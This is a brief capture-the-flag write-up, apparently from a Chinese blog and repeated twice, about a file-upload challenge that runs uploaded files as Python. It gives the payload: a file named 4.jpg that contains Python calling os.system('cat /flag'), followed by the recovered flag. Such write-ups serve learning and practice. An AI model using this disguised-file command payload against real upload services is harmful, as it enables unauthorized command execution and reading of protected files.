
进去是上传一个文件,ctrl+u看一下
只允许上传jpg和png文件,提示说上传的文件会一python执行,那就构建一个名为4.jpg的文件,内容为
import os
os.system('cat /flag')
os.system用来执行cmd指令,在cmd输出的内容会直接在控制台输出
flag{6d8855f8728b8b233cd51d3f792fbd53}
此篇博客揭示了一种通过上传恶意jpg或png文件,利用os.system执行命令的方式,展示了如何在控制台上获取隐藏的flag:flag{6d8855f8728b8b233cd51d3f792fbd53}

进去是上传一个文件,ctrl+u看一下
只允许上传jpg和png文件,提示说上传的文件会一python执行,那就构建一个名为4.jpg的文件,内容为
import os
os.system('cat /flag')
os.system用来执行cmd指令,在cmd输出的内容会直接在控制台输出
flag{6d8855f8728b8b233cd51d3f792fbd53}
1736

被折叠的 条评论
为什么被折叠?